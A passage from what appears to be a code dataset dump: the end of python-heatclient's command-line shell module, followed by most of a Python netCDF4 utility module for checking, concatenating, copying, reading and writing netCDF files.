\") % trace_id)\n\n def do_bash_completion(self, args):\n \"\"\"Prints all of the commands and options to stdout.\n\n The heat.bash_completion script doesn't have to hard code them.\n \"\"\"\n commands = set()\n options = set()\n for sc_str, sc in self.subcommands.items():\n commands.add(sc_str)\n for option in list(sc._optionals._option_string_actions):\n options.add(option)\n\n commands.remove('bash-completion')\n commands.remove('bash_completion')\n print(' '.join(commands | options))\n\n @utils.arg('command', metavar='', nargs='?',\n help=_('Display help for .'))\n def do_help(self, args):\n \"\"\"Display help about this program or one of its subcommands.\"\"\"\n if getattr(args, 'command', None):\n if args.command in self.subcommands:\n self.subcommands[args.command].print_help()\n else:\n raise exc.CommandError(\"'%s' is not a valid subcommand\" %\n args.command)\n else:\n self.parser.print_help()\n\n\nclass HelpFormatter(argparse.HelpFormatter):\n def start_section(self, heading):\n # Title-case the headings\n heading = '%s%s' % (heading[0].upper(), heading[1:])\n super(HelpFormatter, self).start_section(heading)\n\n\ndef main(args=None):\n try:\n if args is None:\n args = sys.argv[1:]\n\n HeatShell().main(args)\n except KeyboardInterrupt:\n print(_(\"... terminating heat client\"), file=sys.stderr)\n sys.exit(130)\n except Exception as e:\n if '--debug' in args or '-d' in args:\n raise\n else:\n print(encodeutils.safe_encode(str(e)), file=sys.stderr)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"openstack/python-heatclient","sub_path":"heatclient/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":26084,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"53"} +{"seq_id":"23138636153","text":"\"\"\"\nModule\n------\n\n netcdf4_interface.py\n\nDescription\n-----------\n\n This module contains functions which interface with the Python\n netCDF4 library.\n\nFunctions\n---------\n\n __get_ncapp_path__(ncapp):\n\n This function checks whether the netCDF application path\n requested upon entry exists; if so, the path to the respective\n netCDF application will be defined and returned.\n\n __read_ncdim_obj__(ncdim_obj)\n\n This function parses a specified object containing netCDF\n dimension variable attributes and builds a Python dictionary\n containing key and value pairs defining the a netCDF variable\n dimensions; the designation between specified attributes and\n namespace attributes is made by checking the respective string\n formats.\n\n __read_ncvar_obj__(ncvar_obj)\n\n This function parses a specified object containing netCDF\n variable attributes and builds a Python dictionary containing\n key and value pairs defining the a netCDF variable attribytes;\n the designation between specified attributes and namespace\n attributes is made by checking the respective string formats.\n\n nccheck(ncfile, ncfrmt=None)\n\n This function checks whether a given file path is a\n netCDF-formatted file and returns a boolean valued variable\n specifying such.\n\n ncconcat(ncfilelist, ncfile, ncdim, ncfrmt=None)\n\n This function concatenates a list of netCDF-formatted files,\n provided in `ncfilelist`, into a single file (`ncfile`); the\n concatenation is performed along a single specified dimension\n (`ncdim`); optional arguments enable the format of the\n concatenated file to be specified.\n\n nccopy(ncfilein, ncfileout, ncfrmtout, ncfrmtin=None,\n ncvarlist=None, ncunlimval=None, use_nccopy=False):\n\n This function performs a direct copy of an input\n netCDF-formattedfile to a specified output netCDF-formatted\n file of a specified format.\n\n nccopyvar(ncfilein, ncfileout, ncvarname, ncvar, ncout_mode,\n ncfrmtin=None, ncfrmtout=None):\n\n This function performs a direct copy of a specified variable\n from a specified input file to a specified output file.\n\n ncnumvar(ncfile, ncfrmt=None)\n\n This function parses a netCDF-formatted file to determine the\n total number of variable arrays within the respective file.\n\n ncreadattr(ncfile, ncattrname, ncvarname=None, ncfrmt=None):\n\n This function parses a netCDF-formatted file to collect the\n specified netCDF attribute value(s).\n\n ncreaddim(ncfile, ncdimname, ncfrmt=None):\n\n This function parses a netCDF-formatted file to collect and\n return the dimension size for the specified dimension variable\n name.\n\n ncreadvar(ncfile, ncvarname, ncfrmt=None, from_ncgroup=False,\n ncgroupname=None, squeeze=False, axis=None, level=None)\n\n This function parses a netCDF-formatted file in order to\n collect and return the values for the specified variable; this\n function also provides optional capabilities to apply the\n numpy squeeze application to truncate to the specified\n dimensions.\n\n ncvarexist(ncfilein, ncvarname, ncfrmtin=None)\n\n This function reads a netCDF-formatted file and queries the\n variable list for the existence of a specified variable name\n (`ncvarname`); it returns a boolean values indicating whether\n the variable name has been found.\n\n ncvarlist(ncfile, ncfrmt=None):\n\n This function reads and returns a list of variables within the\n netCDF-formatted file specified upon entry.\n\n ncwrite(ncfile, ncdim_obj, ncvar_obj, ncfrmt=None,\n glbattrs_dict=None):\n\n This function writes a netCDF-formatted file, containing the\n specified dimensions, variables, and (optional) attributes.\n\n ncwritevar(ncfile, ncvarname, ncvar, ncfrmt=None)\n\n This function opens a netCDF-formatted file and writes the\n array (`ncvar`) values for the specified variable to the\n respective (open) netCDF-formatted file.\n\nRequirements\n------------\n\n- netcdf-c; https://github.com/Unidata/netcdf-c\n\n- netCDF4-python; https://github.com/Unidata/netcdf4-python\n\nAuthor(s)\n---------\n\n Henry R. Winterbottom; 30 November 2022\n\nHistory\n-------\n\n 2022-11-30: Henry Winterbottom -- Initial implementation.\n\n\"\"\"\n\n# ----\n\n# pylint: disable=consider-using-with\n# pylint: disable=no-member\n# pylint: disable=redefined-outer-name\n# pylint: disable=too-many-arguments\n# pylint: disable=too-many-branches\n# pylint: disable=too-many-lines\n# pylint: disable=too-many-locals\n\n# ----\n\nfrom typing import Dict, List, Tuple, Union\n\nimport netCDF4\nimport numpy\nfrom execute import subprocess_interface\nfrom tools import parser_interface, system_interface\nfrom utils.exceptions_interface import NetCDF4InterfaceError\nfrom utils.logger_interface import Logger\n\n# ----\n\n# Define all available module properties.\n__all__ = [\n \"nccheck\",\n \"ncconcat\",\n \"nccopy\",\n \"nccopyvar\",\n \"ncnumvar\",\n \"ncreadattr\",\n \"ncreaddim\",\n \"ncreadvar\",\n \"ncvarexist\",\n \"ncvarlist\",\n \"ncwrite\",\n \"ncwritevar\",\n]\n\n# ----\n\nlogger = Logger(caller_name=__name__)\n\n# ----\n\n\ndef __get_ncapp_path__(ncapp: str) -> str:\n \"\"\"\n Description\n -----------\n\n This function checks whether the netCDF application path requested\n upon entry exists; if so, the path to the respective netCDF\n application will be defined and returned.\n\n Parameters\n ----------\n\n ncapp: ``str``\n\n A Python string specifying the name of the netCDF application.\n\n Returns\n -------\n\n ncapp_path: ``str``\n\n A Python string specifying the path to the netCDF application\n specified upon entry.\n\n Raises\n ------\n\n NetCDFInterfaceError:\n\n - raised if the netCDF application path cannot be determined.\n\n \"\"\"\n\n # Check the run-time environment in order to determine the netCDF\n # application path; proceed accordingly.\n ncapp_path = system_interface.get_app_path(app=f\"{ncapp}\")\n if ncapp_path is None:\n msg = (\n f\"The path for the netCDF application {ncapp} could not be \"\n \"determined for your system; please check that the appropriate \"\n \"libaries/modules are loaded prior to calling this script. \"\n \"Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n return ncapp_path\n\n\n# ----\n\n\ndef __read_ncdim_obj__(ncdim_obj: object) -> Dict:\n \"\"\"\n Description\n -----------\n\n This function parses a specified object containing netCDF\n dimension variable attributes and builds a Python dictionary\n containing key and value pairs defining the a netCDF variable\n dimensions; the designation between specified attributes and\n namespace attributes is made by checking the respective string\n formats.\n\n Parameters\n ----------\n\n ncdim_obj: ``object``\n\n A user specified Python object containing(a) netCDF dimension\n attribute(s).\n\n Returns\n -------\n\n ncdim_dict: ``Dict``\n\n A Python dictionary containing the user-specified netCDF\n variable dimension attributes.\n\n \"\"\"\n\n # Collect the netCDF dimension attributes.\n ncdim_dict = {}\n keys = vars(ncdim_obj)\n for key in keys:\n value = parser_interface.object_getattr(object_in=ncdim_obj, key=key)\n ncdim_dict[key] = value\n\n return ncdim_dict\n\n\n# ----\n\n\ndef __read_ncvar_obj__(ncvar_obj: object) -> Dict:\n \"\"\"\n Description\n -----------\n\n This function parses a specified object containing netCDF variable\n attributes and builds a Python dictionary containing key and value\n pairs defining the a netCDF variable attribytes; the designation\n between specified attributes and namespace attributes is made by\n checking the respective string formats.\n\n Parameters\n ----------\n\n ncvar_obj: ``object``\n\n A user specified Python object containing the netCDF variable\n attribute(s).\n\n Returns\n -------\n\n ncvar_dict: ``Dict``\n\n A Python dictionary containing the user-specified netCDF\n variable attributes.\n\n \"\"\"\n\n # Collect the netCDF variable attributes.\n ncvar_dict = {}\n keys = vars(ncvar_obj)\n for key in keys:\n value = parser_interface.object_getattr(object_in=ncvar_obj, key=key)\n ncvar_dict[key] = value\n\n return ncvar_dict\n\n\n# ----\n\n\ndef nccheck(ncfile: str, ncfrmt: str = None) -> bool:\n \"\"\"\n Description\n -----------\n\n This function checks whether a given file path is a\n netCDF-formatted file and returns a boolean valued variable\n specifying such.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file(to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n is_ncfile: ``bool``\n\n A Python boolean valued variable specifying whether the\n specified input file is a netCDF-formatted file.\n\n \"\"\"\n\n # Check whether the specified file path is a valid\n # netCDF-formatted file and proceed accordingly.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n try:\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n is_ncfile = True\n except OSError:\n is_ncfile = False\n\n return is_ncfile\n\n\n# ----\n\n\ndef ncconcat(ncfilelist: List, ncfile: str, ncdim: str, ncfrmt: str = None) -> None:\n \"\"\"\n Description\n -----------\n\n This function concatenates a list of netCDF-formatted files,\n provided in `ncfilelist`, into a single file (`ncfile`); the\n concatenation is performed along a single specified dimension\n (`ncdim`); optional arguments enable the format of the\n concatenated file to be specified.\n\n Parameters\n ----------\n\n ncfilelist: ``List``\n\n A Python string containing the list of netCDF files to be\n concatenated.\n\n ncfile: ``str``\n\n A Python string specifying the netCDF file(to be created)\n containing the concatenated values collected from each of the\n files to be concatenated.\n\n ncdim: ``str``\n\n A Python string specifying the netCDF variable dimension along\n which to concatenated the respective netCDF files list.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF file\n containing the concatenated values collected from each of the\n files to be concatenated; available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n \"\"\"\n\n # Open the destination netCDF-formatted file and read each\n # variable dimension from the respective source files and\n # define the total array dimension along which the source\n # netCDF-formatted files are to be concatenated.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncdimsum = 0\n dstfile = netCDF4.Dataset(filename=ncfile, mode=\"w\", format=ncfrmt)\n for item in ncfilelist:\n srcfile = netCDF4.Dataset(item)\n for name, dimension in srcfile.dimensions.items():\n if name == ncdim:\n ncdimsum = ncdimsum + len(dimension)\n srcfile.close()\n\n # Define the total dimension size for the destination\n # netCDF-formatted file arrays.\n srcfile = netCDF4.Dataset(filename=ncfilelist[0], mode=\"r\")\n for name, dimension in srcfile.dimensions.items():\n if name == ncdim:\n dimsize = ncdimsum\n else:\n dimsize = len(dimension) if not dimension.isunlimited() else None\n dstfile.createDimension(name, dimsize)\n\n # Check whether the respective source netCDF-formatted files\n # contain groups; proceed accordingly.\n if len(list(srcfile.groups.keys())) > 0:\n # Collect and define the destination netCDF-formatted file\n # attributes.\n for group in srcfile.groups.keys():\n dstfile.createGroup(group)\n dstfile[group].setncatts(srcfile[group].__dict__)\n for name, variable in srcfile[group].variables.items():\n dstfile[group].createVariable(\n name, variable.datatype, variable.dimensions\n )\n\n # Concatenate the variables along the specified axis (i.e.,\n # dimension) and write the results to the destination\n # netCDF-formatted file.\n ncdimsum = 0\n for item in ncfilelist:\n srcfile = netCDF4.Dataset(item)\n ncdimval = len(srcfile.dimensions[ncdim])\n start = ncdimsum\n stop = start + ncdimval\n for group in srcfile.groups.keys():\n for name, variable in srcfile[group].variables.items():\n if ncdim in variable.dimensions:\n dstfile[group][name][start:stop] = srcfile[group][name][:]\n ncdimsum = stop\n srcfile.close()\n else:\n # Collect and define the destination netCDF-formatted file\n # attributes.\n for name, variable in srcfile.variables.items():\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name].setncatts(srcfile[name].__dict__)\n dstfile.setncatts(srcfile.__dict__)\n\n # Concatenate the variables along the specified axis (i.e.,\n # dimension) and write the results to the destination\n # netCDF-formatted file.\n ncdimsum = 0\n for item in ncfilelist:\n srcfile = netCDF4.Dataset(item)\n ncdimval = len(srcfile.dimensions[ncdim])\n start = ncdimsum\n stop = start + ncdimval\n for name, variable in srcfile.variables.items():\n if ncdim in variable.dimensions:\n dstfile[name][start:stop] = srcfile[name][:]\n ncdimsum = stop\n srcfile.close()\n\n # Close the respective netCDF formatted files.\n dstfile.close()\n\n\n# ----\n\n\ndef nccopy(\n ncfilein: str,\n ncfileout: str,\n ncfrmtout: str,\n ncfrmtin: str = None,\n ncvarlist: List = None,\n ncunlimval: int = None,\n use_nccopy: bool = False,\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function performs a direct copy of an input\n netCDF-formattedfile to a specified output netCDF-formatted file\n of a specified format.\n\n Parameters\n ----------\n\n ncfilein: ``str``\n\n A Python string specifying the input netCDF-formatted file to\n be copied.\n\n ncfileout: ``str``\n\n A Python string specifying the netCDF file(to be created)\n containing the contents of the input netCDF file.\n\n ncfrmtout: ``str``\n\n A Python string specifying the format of the netCDF file to be\n created; available options are NETCDF4, NETCDF4_CLASSIC,\n NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or NETCDF3_64BIT_DATA.\n\n Keywords\n --------\n\n ncfrmtin: ``str``, optional\n\n A Python string specifying the format of the input\n netCDF-formatted file; available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n ncvarlist: ``List``, optional\n\n A Python list of variable name strings; if NoneType, the\n variables within the list will be the only variables written\n to the destination netCDF-formatted file.\n\n ncunlimval: ``int``, optional\n\n A Python integer value specifying the unlimited dimension\n size; if NoneType, the dimension size will be 0.\n\n use_nccopy: ``bool``, optional\n\n A Python boolean valued variable specifying whether to use the\n netCDF nccopy utility to produce a direct copy of the\n netCDF-formatted file specified upon entry.\n\n Raises\n ------\n\n NetCDF4InterfaceError:\n\n - raised if the netCDF nccopy application output file form is\n not supported.\n\n \"\"\"\n\n # Use the netCDF applications on the local platform to produce a\n # copy of the netCDF-formatted file provided upon entry; this\n # should be used in instances of netCDF-formatted files containing\n # hierarchial groups.\n if use_nccopy:\n # Define the nccopy application for the local platform.\n nccopy_app = __get_ncapp_path__(ncapp=\"nccopy\")\n\n # Define the argument string corresponding to the format of\n # the copied netCDF-formatted file; proceed accordingly.\n ncfrmtout_dict = {\n \"NETCDF4\": \"4\",\n \"NETCDF4_CLASSIC\": \"4\",\n \"NETCDF3_CLASSIC\": \"3\",\n \"NETCDF3_64BIT_OFFSET\": \"2\",\n \"NETCDF3_64BIT_DATA\": \"6\",\n }\n nccopy_app_str = parser_interface.dict_key_value(\n dict_in=ncfrmtout_dict, key=ncfrmtout, force=True, no_split=True\n )\n if nccopy_app_str is None:\n msg = (\n \"The netCDF nccopy application output file formatted \"\n f\"type {ncfrmtout} is not supported. Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Create a direct copy of the netCDF-formatted file provided\n # upon entry.\n msg = (\n f\"Creating a direct copy of netCDF-formatted file path {ncfilein} \"\n f\"as {ncfileout} and format {ncfrmtout.upper()}.\"\n )\n logger.info(msg=msg)\n cmd = [f\"-{nccopy_app_str}\", f\"{ncfilein}\", f\"{ncfileout}\"]\n subprocess_interface.run(exe=nccopy_app, job_type=\"app\", args=cmd)\n\n # Create a direct copy of the netCDF formatted file provided upon\n # entry using the Python netCDF4 library attributes.\n if not use_nccopy:\n # Initialize the source and destination netCDF-formatted\n # files.\n if ncfrmtin is None:\n ncfrmtin = \"NETCDF4_CLASSIC\"\n srcfile = netCDF4.Dataset(ncfilein, \"r\", format=ncfrmtin)\n dstfile = netCDF4.Dataset(ncfileout, \"w\", format=ncfrmtout)\n\n # Loop through each variable and dimension and define the\n # array dimensions for the destination netCDF-formatted file.\n for name, dimension in srcfile.dimensions.items():\n if ncunlimval is None:\n dimsize = len(dimension) if not dimension.isunlimited() else None\n if ncunlimval is not None:\n dimsize = len(dimension) if not dimension.isunlimited() else ncunlimval\n dstfile.createDimension(name, dimsize)\n\n # Determine the netCDF variables to be copied and proceed\n # accordingly.\n if ncvarlist is None:\n for name, variable in srcfile.variables.items():\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name][:] = srcfile[name][:]\n dstfile[name].setncatts(srcfile[name].__dict__)\n if ncvarlist is not None:\n for name, variable in srcfile.variables.items():\n if name in ncvarlist:\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name][:] = srcfile[name][:]\n dstfile[name].setncatts(srcfile[name].__dict__)\n dstfile.setncatts(srcfile.__dict__)\n\n # Close the open source and destination netCDF-formatted\n # files.\n dstfile.close()\n srcfile.close()\n\n\n# ----\n\n\ndef nccopyvar(\n ncfilein: str,\n ncfileout: str,\n ncvarname: str,\n ncvar: numpy.array,\n ncout_mode: str,\n ncfrmtin: str = None,\n ncfrmtout: str = None,\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function performs a direct copy of a specified variable from\n a specified input file to a specified output file.\n\n Parameters\n ----------\n\n ncfilein: ``str``\n\n A Python string specifying the input(source) netCDF-formatted\n file.\n\n ncfileout: ``str``\n\n A Python string specifying the output(destination)\n netCDF-formatted file.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be copied.\n\n ncvar: ``numpy.array``\n\n A Python array containing the values for the respective netCDF\n variable.\n\n ncout_mode: ``str``\n\n A Python string specifying the write-mode for the output\n netCDF-formatted file; this should typically be either 'w' for\n a new netCDF-formatted file write(this will clobber any\n previous existence of ncfileout) or 'a' to append to an\n existing netCDF-formatted file.\n\n Keywords\n --------\n\n ncfrmtin: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n input file; available options are NETCDF4, NETCDF4_CLASSIC,\n NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or NETCDF3_64BIT_DATA.\n\n ncfrmtout: ``str``, optional\n\n A Python string specifying the format of the netCDF file to be\n written to; available options are NETCDF4, NETCDF4_CLASSIC,\n NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or NETCDF3_64BIT_DATA.\n\n \"\"\"\n\n # Initialize the source and destination netCDF-formatted file.\n if ncfrmtin is None:\n ncfrmtin = \"NETCDF4_CLASSIC\"\n if ncfrmtout is None:\n ncfrmtout = \"NETCDF4_CLASSIC\"\n srcfile = netCDF4.Dataset(filename=ncfilein, mode=\"r\", format=ncfrmtin)\n dstfile = netCDF4.Dataset(filename=ncfileout, mode=ncout_mode, format=ncfrmtout)\n\n # Loop through each variable within the netCDF-formatted file and\n # copy the specified variables to the destination netCDF-formatted\n # file.\n for name, variable in srcfile.variables.items():\n if ncvarname == name:\n dstfile.createVariable(name, variable.datatype, variable.dimensions)\n dstfile[name].setncatts(srcfile[name].__dict__)\n dstfile[name][:] = ncvar\n\n # Close the open source and destination netCDF-formatted files.\n dstfile.close()\n srcfile.close()\n\n\n# ----\n\n\ndef ncnumvar(ncfile: str, ncfrmt: str = None) -> int:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file to determine the\n total number of variable arrays within the respective file.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n numvar: ``int``\n\n A Python integer specifying the total number of variable\n arrays within the respective netCDF-formatted input file.\n\n \"\"\"\n\n # Open the netCDF-formatted file and proceed accordingly.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n numvar = len(ncfile.variables)\n\n # Close the open netCDF-formatted file and return the netCDF\n # variable array.\n ncfile.close()\n\n return numvar\n\n\n# ----\n\n\ndef ncreadattr(\n ncfile: str, ncattrname: str, ncvarname: str = None, ncfrmt: str = None\n) -> Union[str, float, int, Tuple]:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file to collect the\n specified netCDF attribute value(s)\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncattrname: ``str``\n\n A Python string specifying the netCDF attribute to collect and\n return.\n\n Keywords\n --------\n\n ncvarname: ``str``, optional\n\n A Python string specifying the netCDF variable from which to\n retrieve the specified netCDF attribute; a value of NoneType\n implies a global attribute is to be retrieved.\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n ncattr: ``Union[str, float, int, Tuple]``\n\n A Python type containing the value(s) for the specified netCDF\n attribute.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Collect the netCDF attributes accordingly.\n if ncvarname is None:\n ncattr = parser_interface.object_getattr(\n object_in=ncfile, key=ncattrname, force=True\n )\n if ncvarname is not None:\n ncvar = ncfile.variables[ncvarname]\n ncattr = parser_interface.object_getattr(\n object_in=ncvar, key=ncattrname, force=True\n )\n\n # Close the open netCDF-formatted file and return the netCDF\n # attribute.\n ncfile.close()\n\n return ncattr\n\n\n# ----\n\n\ndef ncreaddim(ncfile: str, ncdimname: str, ncfrmt: str = None) -> int:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file to collect and return\n the dimension size for the specified dimension variable name.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncdimname: ``str``\n\n A Python string specifying the netCDF dimension to be\n retrieved and returned.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n ncdim: ``int``\n\n A Python integer specifying the value for the specified\n dimension variable.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Collect the netCDF dimensions accordingly.\n try:\n ncdim = len(\n parser_interface.dict_key_value(\n dict_in=ncfile.dimensions, key=ncdimname, no_split=True\n )\n )\n except KeyError:\n ncdim = None\n\n # Close the open netCDF-formatted file and return the netCDF\n # dimension.\n ncfile.close()\n\n return ncdim\n\n\n# ----\n\n\ndef ncreadvar(\n ncfile: str,\n ncvarname: str,\n ncfrmt: str = None,\n from_ncgroup: bool = False,\n ncgroupname: str = None,\n squeeze: bool = False,\n axis: int = None,\n level: int = None,\n) -> numpy.array:\n \"\"\"\n Description\n -----------\n\n This function parses a netCDF-formatted file in order to collect\n and return the values for the specified variable; this function\n also provides optional capabilities to apply the numpy squeeze\n application to truncate to the specified dimensions.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be retrieved\n and returned.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n from_ncgroup: ``bool``, optional\n\n A Python boolean variable specifying whether the respective\n netCDF variable is contained within a netCDF group/container;\n if True, the parameter ncgroupname must be specified (see\n below).\n\n ncgroupname: ``str``, optional\n\n A Python string specifying the netCDF group/container name;\n used only if from_ncgroup is True upon entry.\n\n squeeze: ``bool``, optional\n\n A Python boolean variable specifying whether to apply the\n numpy squeeze application to truncate the specified variable\n dimension(axis; see below); if True, the variable axis(below)\n must be specified.\n\n axis: ``int``, optional\n\n A Python integer value specifying the variable axis to be\n truncated via the numpy squeeze application.\n\n level: ``int``, optional\n\n A Python integer value specifying the variable level to be\n collected and returned.\n\n Returns\n -------\n\n ncvar: ``numpy.array``\n\n A Python array containing the values for the respective\n specified netCDF variable.\n\n Raises\n ------\n\n NetCDF4InterfaceError:\n\n - raised if the squeeze attribute is implement without\n specifying the variable axis along which to apply the\n squeeze function.\n\n - raised if the netCDF group/container name is not specified\n when from_ncgroup is True upon entry.\n\n - raised if the netCDF group name specified upon entry cannot\n be determined from the contents or the netCDF-formatted file\n specified upon entry.\n\n \"\"\"\n\n # Check the function parameters.\n if squeeze:\n if axis is None:\n msg = (\n \"If implementing the squeeze attribute, the \"\n \"axis about which to squeeze the ingested variable \"\n \"must be specified. Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Open the netCDF-formatted files.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Check whether to read the netCDF variable from a group\n # container; proceed accordingly.\n if from_ncgroup:\n # Check the parameter values provided upon entry and proceed\n # accordingly.\n if ncgroupname is None:\n msg = (\n \"The netCDF group name attribute ncgroupname cannot be \"\n \"NoneType upon entry if attempting to read a netCDF \"\n \"variable from a netCDF group container. Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Define the netCDF groups contained within the\n # netCDF-formatted file provided upon entry.\n ncgroups = parser_interface.dict_key_value(\n dict_in=ncfile.groups, key=ncgroupname, force=True, no_split=True\n )\n if ncgroups is None:\n msg = (\n f\"The netCDF group {ncgroupname} could not be determined from the \"\n f\"contents of netCDF-formatted file {ncfile}. Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Collect the netCDF variable; proceed accordingly.\n if level is None:\n if from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncgroups.variables, key=ncvarname, no_split=True\n )[...]\n if not from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncfile.variables, key=ncvarname, no_split=True\n )[...]\n if level is not None:\n if from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncgroups.variables, key=ncvarname, no_split=True\n )[:, level, :, :]\n if not from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncfile.variables, key=ncvarname, no_split=True\n )[:, level, :, :]\n\n # Close the open netCDF-formatted file.\n ncfile.close()\n\n # If specified, truncate the respective netCDF dimension.\n if squeeze:\n try:\n ncvar = numpy.squeeze(ncvar, axis=axis)\n except ValueError:\n ncvar = ncvar[0, ...]\n\n return ncvar\n\n\n# ----\n\n\ndef ncvarexist(ncfile: str, ncvarname: str, ncfrmt: str = None) -> bool:\n \"\"\"\n Description\n -----------\n\n This function reads a netCDF-formatted file and queries the\n variable list for the existence of a specified variable name\n (`ncvarname`); it returns a boolean values indicating whether the\n variable name has been found.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be queried.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n ncvarexist: ``bool``\n\n A Python boolean variable indicating whether the queried\n variable exists within the respective netCDF file.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Check that the specified netCDF variable exists and proceed\n # accordingly.\n ncvarexist = False\n for name, _ in ncfile.variables.items():\n if ncvarname == name:\n ncvarexist = True\n break\n\n # Close the open netCDF-formatted file.\n ncfile.close()\n\n return ncvarexist\n\n\n# ----\n\n\ndef ncvarlist(ncfile: str, ncfrmt: str = None) -> List:\n \"\"\"\n Description\n -----------\n\n This function reads and returns a list of variables within the\n netCDF-formatted file specified upon entry.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n 